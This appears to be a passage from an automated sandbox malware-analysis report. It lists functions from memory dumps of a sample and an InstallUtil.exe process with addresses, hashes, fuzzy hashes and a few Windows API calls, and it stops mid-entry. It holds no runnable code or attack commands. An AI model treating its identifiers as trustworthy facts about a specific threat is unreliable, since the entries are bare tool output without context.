Opcode Fuzzy Hash: 3d98cbbf5ce8428ba078c10604b643f257b053b98f43bfceee919aae4f9a782c
Instruction Fuzzy Hash: 1941F5B0D04258CFEB64CFAAD85079EFBF6AF89300F15C0AAC509A7254DB758986CF51

Function 06E07BEA Relevance: .1, Instructions: 89COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1424195343.0000000006E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6e00000_50201668.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5798c3bb7f75d05db17c25ad51d31bdc31c8daeeb66a75548122f9d4e7ba1a0c
Instruction ID: 25034b225a0e5846f8fc365882fea36503e94b81304016917b26696b6e3dd263
Opcode Fuzzy Hash: 5798c3bb7f75d05db17c25ad51d31bdc31c8daeeb66a75548122f9d4e7ba1a0c
Instruction Fuzzy Hash: 0331ECB1D057588FEB19CF2B8C502D9FBF7AFC9200F18C1FA8558AA255DB340A868F54

Function 01837738 Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1412116203.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1830000_50201668.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 35d39e6416b99cf573bf5bdd32cb112fa5b82619ca61a5cbaad13fc5136fae34
Instruction ID: 867bd703d4c6db0f698bb7d7de6e8d52f6c72cda41a6efef39e2822515b32168
Opcode Fuzzy Hash: 35d39e6416b99cf573bf5bdd32cb112fa5b82619ca61a5cbaad13fc5136fae34
Instruction Fuzzy Hash: D231A7B1D05628CBEB28CF6BCD4879AFAF6AFC9304F14C1A9C40CA6255DB754A85CF41

Function 0183772B Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1412116203.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1830000_50201668.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dc6bc3b1fdb4b81e9e42f7f4a4d021571b654f9a1f1c6b12f1d431b4027239b1
Instruction ID: f0535a3f269ecd39917fca9bfe314ece62863f260d5d7bd61373bff4d5e5e0c2
Opcode Fuzzy Hash: dc6bc3b1fdb4b81e9e42f7f4a4d021571b654f9a1f1c6b12f1d431b4027239b1
Instruction Fuzzy Hash: B63177B1D016188BEB68CF6BCD5879AFAF3AFC5304F14C1A9C44CAA264DB750A85CF41

Function 07270035 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1436479494.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7270000_50201668.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fa99c4dd020ed1cf12e02e543273d41169cb5b86f5a114a841863ddf50a68bbd
Instruction ID: 119ecf3dd7b253090a4a906a1c5714f41bfcf74c7b0b4de47e27d84c0fdd9c9f
Opcode Fuzzy Hash: fa99c4dd020ed1cf12e02e543273d41169cb5b86f5a114a841863ddf50a68bbd
Instruction Fuzzy Hash: D021CBB1D156698BEB28CF6BCD4439AFAF7AFC9300F14C1BA944CA6255DB700986DF01

Function 06DD1419 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1424090170.0000000006DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6dd0000_50201668.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1b2d8f8d9ea32772e720154e748c2f661dbf48ad485b8ff880aa7f6ee9dd2d5f
Instruction ID: 1c7966a1dbc88584c3266a9eebe0d7be390239484e6f311e5f52d608a03004f2
Opcode Fuzzy Hash: 1b2d8f8d9ea32772e720154e748c2f661dbf48ad485b8ff880aa7f6ee9dd2d5f
Instruction Fuzzy Hash: 4721D8B2D056588BEB18CF6B9C4019EFAF7AFC9304F14C07A9508AB254DA300985CF55

Function 06DF6318 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1424159382.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6df0000_50201668.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 962ec105cf45ca9d0977e359ae6947bd419848e206c8e234c2aeeec26d8b548d
Instruction ID: fbc8a9a4df41d6e5e3059c2757577bed4ec6dc356b9fb4810e3296026baa0cd5
Opcode Fuzzy Hash: 962ec105cf45ca9d0977e359ae6947bd419848e206c8e234c2aeeec26d8b548d
Instruction Fuzzy Hash: 07210BB1D046588BEB58CF9BC9443DEFAF7AFC9300F19C06AD408AA254DB7449498F51

Function 0183A3E1 Relevance: 5.1, Strings: 4, Instructions: 62COMMON

Download Yara Rule

Strings

#, xrefs: 01839F4B
, xrefs: 0183A41C
%, xrefs: 01839FCA
E, xrefs: 0183A3E2

Memory Dump Source

Source File: 00000006.00000002.1412116203.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1830000_50201668.jbxd

Similarity

API ID:
String ID: $#$%$E
API String ID: 0-2919570637
Opcode ID: f6674daf03da4e25a5e9c0747fd445acfca286a633578e11de4b1570f02e12c3
Instruction ID: 8f4ce0d0f0ef32d1a8527ce87d82b07be8c50eb031e3ae8f86f38e2bc9f3eb1a
Opcode Fuzzy Hash: f6674daf03da4e25a5e9c0747fd445acfca286a633578e11de4b1570f02e12c3
Instruction Fuzzy Hash: 7631B3B0D01228CFEB60CF69D848BDDB7F4AF4A305F1882D9D459A6245C7B45A84CF91

Analysis Process: InstallUtil.exePID: 7584, Parent PID: 4056COMMON

Execution Graph

Execution Coverage:	14.8%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	197
Total number of Limit Nodes:	16

Executed Functions

Function 015CC548 Relevance: 4.3, Strings: 1, Instructions: 3069COMMON

Download Yara Rule

Strings

N, xrefs: 015CF928

Memory Dump Source

Source File: 00000009.00000002.2519318325.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15c0000_InstallUtil.jbxd

Similarity

API ID:
String ID: N
API String ID: 0-1130791706
Opcode ID: 728654414d3d0e60972a38fcb48cfafdcd1fcc62c0b3e6415dfc25726507339d
Instruction ID: 954ebdd096baeb1326fa385fb307eef732d29454ee753db96fe0eef684e2987c
Opcode Fuzzy Hash: 728654414d3d0e60972a38fcb48cfafdcd1fcc62c0b3e6415dfc25726507339d
Instruction Fuzzy Hash: 8C73D971D1075A8EDB11EFA8C844A99FBB1FF95300F51C69AE4587B121EB70AAC4CF81

Function 015C2DD1 Relevance: .4, Instructions: 405
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000009.00000002.2519318325.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15c0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ed43789b1cf0ce9501d3ce5df3182387237fe5118d5471794c7cac57a107cd66
Instruction ID: 2edd3624ae7d89aa618a627e605c9237a5cec4a9c5bd54aef38b54913e3b2487
Opcode Fuzzy Hash: ed43789b1cf0ce9501d3ce5df3182387237fe5118d5471794c7cac57a107cd66
Instruction Fuzzy Hash: 07E14F35E00318CFDB58DFB9D8546AEBBB2BF88710B15856EE406AB344DF359806CB91

Function 015C9490 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2519318325.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15c0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fee9c5a084f7bcdefadf66f98909e2b666b05fd1db7be9bcc221f7fe815d6fb8
Instruction ID: f8c2668ae00df417ac01cfda0618370c514e12ff99e3a430b138923f864a1d6a
Opcode Fuzzy Hash: fee9c5a084f7bcdefadf66f98909e2b666b05fd1db7be9bcc221f7fe815d6fb8
Instruction Fuzzy Hash: FDC18F74E00218CFDB14DFA9D994B9DBBB2FB89304F1081AAE809AB355DB355E85CF50

Function 015CC539 Relevance: .2, Instructions: 226COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2519318325.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15c0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cfa322519e6ba0ed11c0b49a462f5fa1cafe8f46dff2b430643808ee4b830c6c
Instruction ID: 4667b26f4eb3e1be4cce3571ba4507a357f9e5570c8142f20121c4437a752ba6
Opcode Fuzzy Hash: cfa322519e6ba0ed11c0b49a462f5fa1cafe8f46dff2b430643808ee4b830c6c
Instruction Fuzzy Hash: 55A10371D0061A8EDB14DFA9C8447DEFBB1FF99300F10C6AAE4586B261EB709A85CF41

Function 015C9A40 Relevance: .2, Instructions: 223COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2519318325.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15c0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7bebbd435db83b7a3ef90da89558dc52827fb0ba46bcd65defc76ed70ac35a5b
Instruction ID: 02c1195e1c4e964f4e5ade996df8a56ee582b374be73ed74116f1b9f1939066d
Opcode Fuzzy Hash: 7bebbd435db83b7a3ef90da89558dc52827fb0ba46bcd65defc76ed70ac35a5b
Instruction Fuzzy Hash: 1EA10670D00209CFEB14DFA9C958BDDBBB1FF88304F20826AE449AB291DB749985CF55

Function 015C9A50 Relevance: .2, Instructions: 220COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2519318325.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15c0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1e79282034d87b2302a9802152433e90752f5701e8e534ef1b65a671be95b0ce
Instruction ID: d8b618a015c1b64c1570c9e1971564397d1436e88994c763fca15c07e2a02931
Opcode Fuzzy Hash: 1e79282034d87b2302a9802152433e90752f5701e8e534ef1b65a671be95b0ce
Instruction Fuzzy Hash: 03A10470D00209CFEB14DFA9C948B9DBBB1FF88314F20826AE449AB291DB749985CF55

Function 015C9D97 Relevance: .2, Instructions: 202COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2519318325.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15c0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c8df4ad3b18254c26f7091b193eb82e67e9faa64cadbe6b37689c3efaf740ce7
Instruction ID: 7432d0d0ff8027442b9910b8b733a61a1ed2aabd9704592c711ffa9d9682f7c7
Opcode Fuzzy Hash: c8df4ad3b18254c26f7091b193eb82e67e9faa64cadbe6b37689c3efaf740ce7
Instruction Fuzzy Hash: 3391F370D00208CFEB14DFA9C948BDCBBB1FF49314F24826AE549AB291DB749985CF55

Function 015C947F Relevance: .1, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2519318325.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15c0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1712f3d3037f4a81abaab97803c51d9ced0b8799cb4ca5ae77360ffc1d15005f
Instruction ID: 4bce736b3d6b136668207bd78681c679a5bb056a54aedd150935002f4f9386af
Opcode Fuzzy Hash: 1712f3d3037f4a81abaab97803c51d9ced0b8799cb4ca5ae77360ffc1d15005f
Instruction Fuzzy Hash: 9641B2B5D00208CFEB18CFEAD5546AEFBF2BF88304F24912AD815AB255DB394946CF54

Function 07144388 Relevance: 1.7, APIs: 1, Instructions: 195
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000009.00000002.2525865041.0000000007140000.00000040.00000800.00020000.00000000.sdmp, Offset: 07140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7140000_InstallUtil.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: bfe26e79ec89e85abc4fff882cfbf7cd0e4cf704de7daeddf4126cf68dc28500
Instruction ID: 89c2b01e720de745002af1880e958a4b87e371f925ea9444a4bc305e02b79907
Opcode Fuzzy Hash: bfe26e79ec89e85abc4fff882cfbf7cd0e4cf704de7daeddf4126cf68dc28500
Instruction Fuzzy Hash: 64717BB0A00B468FDB25DF29D45475AB7F1FF88300F048A2ED89ADBA80D774E845CB91

Function 07146910 Relevance: 1.6, APIs: 1, Instructions: 144
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 07146A82

Memory Dump Source

Source File: 00000009.00000002.2525865041.0000000007140000.00000040.00000800.00020000.00000000.sdmp, Offset: 07140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7140000_InstallUtil.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: b25b9516938d9b3414eb441b33b718472d1d6ce18adf77df8d18fb790c9dc0d5
Instruction ID: c1d96c00039d584c9c3d36c0d6b2f0716dd7742a9bdc338a5f4a23ca87c91018
Opcode Fuzzy Hash: b25b9516938d9b3414eb441b33b718472d1d6ce18adf77df8d18fb790c9dc0d5
Instruction Fuzzy Hash: 205101B1C00249EFDF15CF99C980ACEBFB6BF49314F24816AE918AB260D7759854CF90

Function 07145D7C Relevance: 1.6, APIs: 1, Instructions: 116
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 07146A82

Memory Dump Source

Source File: 00000009.00000002.2525865041.0000000007140000.00000040.00000800.00020000.00000000.sdmp, Offset: 07140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7140000_InstallUtil.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 052e04f1bd2b135d85bcbcf5887e8ce422ff742db01af5d5be7b796fb1adfa69
Instruction ID: 231fcc1e26173dfd32872dec65ac90bc3cc126489a2cc7aa9989bdeaec9a80e1
Opcode Fuzzy Hash: 052e04f1bd2b135d85bcbcf5887e8ce422ff742db01af5d5be7b796fb1adfa69
Instruction Fuzzy Hash: 4251D1B1D10349DFDB14CF99C884ADEBBB5FF49314F24812AE819AB250D7749845CF90

Function 07145ECC Relevance: 1.6, APIs: 1, Instructions: 97
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 07148FF1

Memory Dump Source

Source File: 00000009.00000002.2525865041.0000000007140000.00000040.00000800.00020000.00000000.sdmp, Offset: 07140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7140000_InstallUtil.jbxd

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: 599d9d3ac766b78141f2db22d0632b16ae8149f9d03adcb4be7a6387cf056877
Instruction ID: a20e7958f9f344b99503f572e4c95caf370ecb8f305b6576880c36e158fb5201
Opcode Fuzzy Hash: 599d9d3ac766b78141f2db22d0632b16ae8149f9d03adcb4be7a6387cf056877
Instruction Fuzzy Hash: 6D4136B5910309DFDB14CF99C888AAABBF5FF88314F248459E519AB361D735A841CFA0

Function 015CAF88 Relevance: 1.6, Strings: 1, Instructions: 323
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

, xrefs: 015CB075

Memory Dump Source

Source File: 00000009.00000002.2519318325.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15c0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 8377ccf8a1fb9cd00882348c02d4358559d3355f5f9b70ca9ccc5e68c89e2d99
Instruction ID: be19b1de4dd564ee637224fca8682261537e3562e8496cc11536c578f8e58dad
Opcode Fuzzy Hash: 8377ccf8a1fb9cd00882348c02d4358559d3355f5f9b70ca9ccc5e68c89e2d99
Instruction Fuzzy Hash: E4B1E4307047048FDB199FB8A86926E7BA2BFC56A4B24412EE915DF3D1CF358D05C7A1

Function 0714B4D0 Relevance: 1.6, APIs: 1, Instructions: 69
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OleInitialize.OLE32(00000000), ref: 0714B48D

Memory Dump Source

Source File: 00000009.00000002.2525865041.0000000007140000.00000040.00000800.00020000.00000000.sdmp, Offset: 07140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7140000_InstallUtil.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 787e40cd8efbdbce95f566d788c20fdacffe5198f11029c517f8d9e619d4d68a
Instruction ID: 6c7d0e087c2da536acd747bb765132d38281fa2d880d395ac119b8bb6f82a952
Opcode Fuzzy Hash: 787e40cd8efbdbce95f566d788c20fdacffe5198f11029c517f8d9e619d4d68a
Instruction Fuzzy Hash: 832144B6C046489FDB20DF9AD444BCEFBF4EB48320F24841AE459A7350C378A544CFA1

Function 071432DC Relevance: 1.6, APIs: 1, Instructions: 50
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000,?,?,?,?,?,?,?,071443A4), ref: 071445DE

Memory Dump Source

Source File: 00000009.00000002.2525865041.0000000007140000.00000040.00000800.00020000.00000000.sdmp, Offset: 07140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7140000_InstallUtil.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: f92e4210010f3625ea78b3c5f1ebb600b40ee700401cc79d6a97ff505f99e239
Instruction ID: 01835dd7e2c9a66a2f55b9f2c3881e2da325e6bb74c934e99f56b3437f922d48
Opcode Fuzzy Hash: f92e4210010f3625ea78b3c5f1ebb600b40ee700401cc79d6a97ff505f99e239
Instruction Fuzzy Hash: DB1132B6C006499FDB20CF9AC544BDEFBF4EB48210F10852AD818AB240D379A505CFA1

Function 0714B430 Relevance: 1.5, APIs: 1, Instructions: 47
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OleInitialize.OLE32(00000000), ref: 0714B48D

Memory Dump Source

Source File: 00000009.00000002.2525865041.0000000007140000.00000040.00000800.00020000.00000000.sdmp, Offset: 07140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7140000_InstallUtil.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: b9b19c688064ccd66cc340197d99d19402d8965c755b0f34d3198c9f2549fd33
Instruction ID: 8ef1475ae780f10f3df930f09663fe68167382e968a65de78f83ff175ebb2847
Opcode Fuzzy Hash: b9b19c688064ccd66cc340197d99d19402d8965c755b0f34d3198c9f2549fd33
Instruction Fuzzy Hash: B31130B58003488FDB20DF9AD844BDEBBF8EB88320F248419E519A7340C778A944CFA5

Function 0714A5A0 Relevance: 1.5, APIs: 1, Instructions: 46
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OleInitialize.OLE32(00000000), ref: 0714B48D

Memory Dump Source

Source File: 00000009.00000002.2525865041.0000000007140000.00000040.00000800.00020000.00000000.sdmp, Offset: 07140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7140000_InstallUtil.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 002c606c9092cc1106976364e655b2abf1a2b4e085a91c9a683af4a7ccec273e
Instruction ID: c0f6214c40916110b417525d296fc2f02cdae4ab95e0141a5f39c8a5bcd94482
Opcode Fuzzy Hash: 002c606c9092cc1106976364e655b2abf1a2b4e085a91c9a683af4a7ccec273e
Instruction Fuzzy Hash: FF110DB5904348CFDB20DF9AD548B9EBBF8EB48220F24845AE519A7340D379A944CFA5

Function 015CAF79 Relevance: 1.5, Strings: 1, Instructions: 240
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

, xrefs: 015CB025

Memory Dump Source

Source File: 00000009.00000002.2519318325.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15c0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 44c7d2b490f418cf045e86ca46fe51ab2af0b5ddcaa98fb9b11d1a10ce96d0b2
Instruction ID: 7bc7a5261652b6fb6c710a234ca72dcf2ac81cfbf650a1eebf0b22d63c7ec8f4
Opcode Fuzzy Hash: 44c7d2b490f418cf045e86ca46fe51ab2af0b5ddcaa98fb9b11d1a10ce96d0b2
Instruction Fuzzy Hash: 0F8105307007018FDB199FB8E86926E7BA2BFC9664B24452EE919DB3D0CF348C01C7A1

Function 015C19B8 Relevance: .9, Instructions: 875
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000009.00000002.2519318325.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15c0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 00d93580cb72326a1b09380f9121810c290fcc923241691e8524e7785f8b27b2
Instruction ID: 262644d0dd85d5c363a6833c43b48db64fae9ddb4e958fb8be2d85bdc092f0b0
Opcode Fuzzy Hash: 00d93580cb72326a1b09380f9121810c290fcc923241691e8524e7785f8b27b2
Instruction Fuzzy Hash: 346271366643518FC7F18F6594DA1FABBF0FF91235B2444AEC1C08AD42E771484ACBA6

Function 015CB510 Relevance: .4, Instructions: 392
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000009.00000002.2519318325.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15c0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e90a56dc2763b05192be8dd0b1f5737ff382c377f1a8b9b0abcb74d6dab62831
Instruction ID: d49247ef5f1c165feaf1e41cb425e44bf3a7d2e1c619f88513647277bffbf21b
Opcode Fuzzy Hash: e90a56dc2763b05192be8dd0b1f5737ff382c377f1a8b9b0abcb74d6dab62831
Instruction Fuzzy Hash: EFD1E230B042058FDB15DEACD891AAE7BB2FF89760F14416AE505DF391DA31DC45CBA1

Function 015CBF98 Relevance: .2, Instructions: 227COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2519318325.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15c0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c01b29e117e820549d93f3a9742d5bcd6a690fd49a5094fea710961bebc7091b
Instruction ID: 3ee389d8015a5d22dfaac090881c2453e3636f3c5c7395f49430030f5c05c9a1
Opcode Fuzzy Hash: c01b29e117e820549d93f3a9742d5bcd6a690fd49a5094fea710961bebc7091b
Instruction Fuzzy Hash: C261E372B007069FDB14DEBDD844AAEBBF9FBC9620B14852EE55DEB341D631D80187A0

Function 015C0B23 Relevance: .2, Instructions: 205COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2519318325.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15c0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 617baba38b81c20b4277de9864bca4df2fadb8329eb6394506a324573736af7b
Instruction ID: dc25e0e99a679e6560447b54e8908c2d77b28f9490b8c199ebb16ecc89276fb3
Opcode Fuzzy Hash: 617baba38b81c20b4277de9864bca4df2fadb8329eb6394506a324573736af7b
Instruction Fuzzy Hash: B3A1C974E00209CFDB18DFA8F99899DBBB1FF48300B108569E415AB355EB746D46CF91

Function 015C0B30 Relevance: .2, Instructions: 200COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2519318325.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15c0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 32704418f0bc9372457a31cffb91664e197b38a19262f88dcbc78b9671d18d20
Instruction ID: 00b714dddff15a2c1c9d1f37c8ec840129b96da068d8a595e7eb86aa53058200
Opcode Fuzzy Hash: 32704418f0bc9372457a31cffb91664e197b38a19262f88dcbc78b9671d18d20
Instruction Fuzzy Hash: 43A1B974E00209CFDB14EFA8F98899DBBB1FB4C340B108569E415AB355EB746D46CF91

Function 015C8927 Relevance: .1, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2519318325.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15c0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 024b4a886eeb862870444886e162c6414c74ebb30b0b979e00adef2a23034a77
Instruction ID: 8c72895a7428dc341e095f490a34ba0df29d2bbe00febba5f244af3675f10747
Opcode Fuzzy Hash: 024b4a886eeb862870444886e162c6414c74ebb30b0b979e00adef2a23034a77
Instruction Fuzzy Hash: 74518030A0020ACFEB15DFB9D8487AE7BF1BF89B14F04846DD402AF295DB748945CB61

Function 015CB7F8 Relevance: .1, Instructions: 128COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2519318325.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15c0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8012ba06737cea836891f01785221beb0f8ab498e913309c35d5793f92a8784c
Instruction ID: b55037724ac72b7919ac2d61aefbf006eedf6a2902f20c143004aa1eb45db9e0
Opcode Fuzzy Hash: 8012ba06737cea836891f01785221beb0f8ab498e913309c35d5793f92a8784c
Instruction Fuzzy Hash: FD411635A002098FDB15DFA8C491EDEBBB2FF88620F195154E501AF3A1DB71EC42CBA1

Function 015C3F78 Relevance: .1, Instructions: 127COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2519318325.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15c0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2cead961e1a49e9f8a848a623a384564eb9c002fa10c4813064403bb40ceec7b
Instruction ID: b536e8363ba8acaf275ad3110ab83deb6367ad8dce6010e1ec16eb5f28c3e1c3
Opcode Fuzzy Hash: 2cead961e1a49e9f8a848a623a384564eb9c002fa10c4813064403bb40ceec7b
Instruction Fuzzy Hash: BB519E74E00208DFDB58DFA9D994AADBBF2BF89310F109469E815BB364DB349846CF50

Function 015C3168 Relevance: .1, Instructions: 109COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2519318325.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15c0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 28614ce70a877d5c5685d575d2d38dc4661a9ff6c255234f4ba36ef27144c10e
Instruction ID: efd60218933519cdcd28ae077c27759af2eb1b8c0b04202d982d3bb100e2c5df
Opcode Fuzzy Hash: 28614ce70a877d5c5685d575d2d38dc4661a9ff6c255234f4ba36ef27144c10e
Instruction Fuzzy Hash: FC41A075E01208CFDB48DFEAE88499DBBB2BF89310F249429E815BB364DB345845CF54

Function 015C9259 Relevance: .1, Instructions: 109COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2519318325.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15c0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
